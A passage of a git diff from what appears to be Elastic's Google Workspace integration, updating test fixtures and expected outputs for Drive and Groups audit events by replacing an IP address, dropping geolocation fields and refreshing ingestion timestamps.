}, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -2205,7 +1791,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -2243,8 +1829,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:28.822626800Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"acl_change\",\"name\":\"change_document_access_scope\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"new_value\",\"value\":\"owner\"},{\"name\":\"old_value\",\"value\":\"writers\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"old_visibility\",\"value\":\"people_within_domain_with_link\"},{\"name\":\"visibility_change\",\"value\":\"external\"},{\"name\":\"target_domain\",\"value\":\"all\"}]}}", + "ingested": "2021-12-09T13:39:08.398415Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"acl_change\",\"name\":\"change_document_access_scope\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document 
title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"new_value\",\"value\":\"owner\"},{\"name\":\"old_value\",\"value\":\"writers\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"old_visibility\",\"value\":\"people_within_domain_with_link\"},{\"name\":\"visibility_change\",\"value\":\"external\"},{\"name\":\"target_domain\",\"value\":\"all\"}]}}", "provider": "drive", "action": "change_document_access_scope", "id": "1", @@ -2265,31 +1851,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -2309,7 +1877,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -2347,8 +1915,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:28.822628300Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"acl_change\",\"name\":\"change_document_visibility\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"new_value\",\"value\":\"owner\"},{\"name\":\"old_value\",\"value\":\"writers\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"old_visibility\",\"value\":\"people_within_domain_with_link\"},{\"name\":\"visibility_change\",\"value\":\"external\"},{\"name\":\"target_domain\",\"value\":\"all\"}]}}", + "ingested": "2021-12-09T13:39:08.398418500Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"acl_change\",\"name\":\"change_document_visibility\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document 
title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"new_value\",\"value\":\"owner\"},{\"name\":\"old_value\",\"value\":\"writers\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"old_visibility\",\"value\":\"people_within_domain_with_link\"},{\"name\":\"visibility_change\",\"value\":\"external\"},{\"name\":\"target_domain\",\"value\":\"all\"}]}}", "provider": "drive", "action": "change_document_visibility", "id": "1", @@ -2369,31 +1937,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -2414,7 +1964,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -2451,8 +2001,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:28.822629700Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"acl_change\",\"name\":\"shared_drive_membership_change\",\"parameters\":[{\"name\":\"added_role\",\"value\":\"editor\"},{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"removed_role\",\"value\":\"content_manager\"},{\"name\":\"membership_change_type\",\"value\":\"add_to_shared_drive\"},{\"name\":\"target\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:39:08.398423Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"acl_change\",\"name\":\"shared_drive_membership_change\",\"parameters\":[{\"name\":\"added_role\",\"value\":\"editor\"},{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document 
title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"removed_role\",\"value\":\"content_manager\"},{\"name\":\"membership_change_type\",\"value\":\"add_to_shared_drive\"},{\"name\":\"target\",\"value\":\"user@example.com\"}]}}", "provider": "drive", "action": "shared_drive_membership_change", "id": "1", @@ -2473,31 +2023,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -2518,7 +2050,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -2555,8 +2087,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:28.822631100Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"acl_change\",\"name\":\"shared_drive_settings_change\",\"parameters\":[{\"name\":\"new_settings_state\",\"value\":\"restricted\"},{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"old_settings_state\",\"value\":\"unrestricted\"},{\"name\":\"shared_drive_settings_change_type\",\"value\":\"direct_acl\"},{\"name\":\"target\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:39:08.398428200Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"acl_change\",\"name\":\"shared_drive_settings_change\",\"parameters\":[{\"name\":\"new_settings_state\",\"value\":\"restricted\"},{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document 
title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"old_settings_state\",\"value\":\"unrestricted\"},{\"name\":\"shared_drive_settings_change_type\",\"value\":\"direct_acl\"},{\"name\":\"target\",\"value\":\"user@example.com\"}]}}", "provider": "drive", "action": "shared_drive_settings_change", "id": "1", @@ -2577,31 +2109,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -2621,7 +2135,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -2654,8 +2168,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:28.822632500Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"acl_change\",\"name\":\"sheets_import_range_access_change\",\"parameters\":[{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"sheets_import_range_recipient_doc\",\"value\":\"1234\"}]}}", + "ingested": "2021-12-09T13:39:08.398433200Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"acl_change\",\"name\":\"sheets_import_range_access_change\",\"parameters\":[{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"sheets_import_range_recipient_doc\",\"value\":\"1234\"}]}}", "provider": "drive", "action": "sheets_import_range_access_change", "id": 
"1", @@ -2676,31 +2190,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -2721,7 +2217,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -2759,8 +2255,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:28.822633900Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"acl_change\",\"name\":\"change_user_access\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"new_value\",\"value\":\"can_comment\"},{\"name\":\"old_value\",\"value\":\"can_view\"},{\"name\":\"old_visibility\",\"value\":\"people_with_link\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"target_user\",\"value\":\"user@example.com\"},{\"name\":\"visibility\",\"value\":\"private\"},{\"name\":\"visibility_change\",\"value\":\"external\"}]}}", + "ingested": "2021-12-09T13:39:08.398437400Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"acl_change\",\"name\":\"change_user_access\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document 
title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"new_value\",\"value\":\"can_comment\"},{\"name\":\"old_value\",\"value\":\"can_view\"},{\"name\":\"old_visibility\",\"value\":\"people_with_link\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"target_user\",\"value\":\"user@example.com\"},{\"name\":\"visibility\",\"value\":\"private\"},{\"name\":\"visibility_change\",\"value\":\"external\"}]}}", "provider": "drive", "action": "change_user_access", "id": "1", diff --git a/packages/google_workspace/data_stream/groups/_dev/test/pipeline/test-groups.log b/packages/google_workspace/data_stream/groups/_dev/test/pipeline/test-groups.log index e67fe7571a3..5014f5a7063 100644 --- a/packages/google_workspace/data_stream/groups/_dev/test/pipeline/test-groups.log +++ b/packages/google_workspace/data_stream/groups/_dev/test/pipeline/test-groups.log 
@@ -1,25 +1,25 @@ -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"acl_change","name":"change_acl_permission","parameters":[{"name":"acl_permission","value":"can_add_members"},{"name":"group_email","value":"group@example.com"},{"name":"new_value_repeated","multiValue":["managers","members"]},{"name":"old_value_repeated","multiValue":["managers"]}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"moderator_action","name":"accept_invitation","parameters":[{"name":"group_email","value":"group@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"moderator_action","name":"approve_join_request","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"user_email","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"moderator_action","name":"join","parameters":[{"name":"group_email","value":"group@example.com"}]}} 
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"moderator_action","name":"request_to_join","parameters":[{"name":"group_email","value":"group@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"moderator_action","name":"change_basic_setting","parameters":[{"name":"basic_setting","value":"allow_external_members"},{"name":"group_email","value":"group@example.com"},{"name":"new_value","value":"true"},{"name":"old_value","value":"false"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"moderator_action","name":"create_group","parameters":[{"name":"group_email","value":"group@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"moderator_action","name":"delete_group","parameters":[{"name":"group_email","value":"group@example.com"}]}} 
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"moderator_action","name":"change_identity_setting","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"identity_setting","value":"required_forms_of_identity"},{"name":"new_value","value":"display_name_only"},{"name":"old_value","value":"display_name_or_google_profile"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"moderator_action","name":"add_info_setting","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"info_setting","value":"custom_footer"},{"name":"value","value":"footer"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"moderator_action","name":"change_info_setting","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"info_setting","value":"custom_footer"},{"name":"new_value","value":"footer"},{"name":"old_value","value":"old footer"}]}} 
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"moderator_action","name":"remove_info_setting","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"info_setting","value":"custom_footer"},{"name":"value","value":"footer"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"moderator_action","name":"change_new_members_restrictions_setting","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"new_members_restrictions_setting","value":"new_members_can_post"},{"name":"new_value","value":"inherit"},{"name":"old_value","value":"overriden_to_false"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"moderator_action","name":"change_post_replies_setting","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"post_replies_setting","value":"where_should_replies_be_sent"},{"name":"new_value","value":"reply_to_custom_address"},{"name":"old_value","value":"reply_to_author_only"}]}} 
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"moderator_action","name":"change_spam_moderation_setting","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"spam_moderation_setting","value":"how_to_handle_suspected_spam_messages"},{"name":"new_value","value":"moderate_and_do_not_send_notifications"},{"name":"old_value","value":"moderate_and_send_notifications"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"moderator_action","name":"change_topic_setting","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"topic_setting","value":"allowed_topic_types"},{"name":"new_value","value":"discussions_questions"},{"name":"old_value","value":"discussions"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"moderator_action","name":"moderate_message","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"message_moderation_action","value":"approved"},{"name":"status","value":"succeeded"},{"name":"message_id","value":"message id"}]}} 
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"moderator_action","name":"always_post_from_user","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"user_email","value":"user@example.com"},{"name":"status","value":"succeeded"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"moderator_action","name":"add_user","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"user_email","value":"user@example.com"},{"name":"member_role","value":"manager"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"moderator_action","name":"ban_user_with_moderation","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"user_email","value":"user@example.com"},{"name":"member_role","value":"manager"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"moderator_action","name":"revoke_invitation","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"user_email","value":"user@example.com"}]}} 
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"moderator_action","name":"invite_user","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"user_email","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"moderator_action","name":"reject_join_request","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"user_email","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"moderator_action","name":"reinvite_user","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"user_email","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"moderator_action","name":"remove_user","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"user_email","value":"user@example.com"}]}} 
